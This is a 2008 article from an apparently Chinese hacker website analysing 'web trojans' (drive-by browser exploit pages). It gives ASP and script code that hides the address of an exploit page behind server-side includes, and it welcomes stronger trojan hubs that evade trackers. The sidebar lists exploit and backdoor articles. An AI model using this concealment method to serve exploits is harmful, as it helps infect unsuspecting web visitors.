黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 电脑新手 >> 正文
·网马的运行分析05-12·登录任意windows系统帐号05-12
·Windows 2003至Windows 05-12·IGotFree 提供无限容量免05-12
·我要试试提供80M免费php05-11·巧用闪存,防遗忘 Vista05-10
·文件夹的终极隐藏05-10·Netfirms提供25M免费php05-10
·让Windows 2003在“内存05-09·悠悠php提供1000M免费ph05-09
·网站注入如何绕过限制!05-08·实例讲解跨站入侵攻防战05-08
·rgboard 3.0.12 远程文件05-08·迅雷本地溢出POC05-08
·perl后门,正向和反向05-08·嘉英网提供50-1000M免费05-08
·掌控Vista从控制面板说起05-07·XP系统桌面主题搬家小技05-07
·把Windows 2008 RC1配置05-07·用WinPE备份Windows Vis05-07
·无限网络免费硬盘-易上传05-07·火网数据中心提供30M免费05-07
·新思路用Gene恢复系统管05-06·虫网磁盘100M免费网络硬05-06
·天寻网络提供30-100M免费05-06·Windows Server 2008使用05-05
·51.com提供1000M网络免费05-05·站长扶持计划---站长中国05-05
[推荐]网马的运行分析
        ★★★★★

网马的运行分析

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-5-12 10:41:34

其实想想就会知道,网马的exp总会有暴露的时刻,也就是说,我的系统环境只要满足条件就可以获得这个网马的exp。通过结合服务端的技术手段,我们可以隐藏网马exp的地址,但是却无法保证这个exp不暴露出来,exp终究要在你的浏览器上执行恶意行为。
比如下面code可以隐藏网马exp的地址,却不得不暴露出这个exp:

http://127.0.0.1/s_trojan/index.html的代码:

以下是引用片段:
<script src=”http://127.0.0.1/s_trojan/blackbox_0.asp”></script>

http://127.0.0.1/s_trojan/blackbox_0.asp的代码:<!– #include file=”blackbox_1.asp” –>

http://127.0.0.1/s_trojan/blackbox_1.asp的代码:

以下是引用片段:

document.write(’js go here……’)
<%
function xss()
response.write “alert(’hello asp.’);”
end function
xss()
function f(filename)
set objFSO=Server.CreateObject(”Scripting.FileSystemObject”)
set objCountFile=objFSO.OpenTextFile(Server.MapPath(filename),1,True)
f=objCountFile.readall
objCountFile.close
set objCountFile=nothing
set objFSO=nothing
end function
x=f(”last_trojan.html”)
response.write x
%>
trojan()

最终的网马exp地址为http://127.0.0.1/s_trojan/last_trojan.html。blackbox_1.asp的代码既要保证服务端正确执行,又要保证客户端能正确执行其最终的JS代码。其实这些中间asp文件会暴露最终的网马exp的内容。但是却不会暴露地址。

结合服务端技术其实能做很多事,网马也将更加强大,更容易以服务端为中心而被控制着:-)。强大的网马中枢应该要能判断目标系统的环境而选择性地运行,并有详细的统计功能。这样会给跟踪者带来许多麻烦:-)。但,是不是能真正隐藏网马exp呢?原则上是不行的,因为exp总要输出,否则你的浏览器漏洞如何被触发?

文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886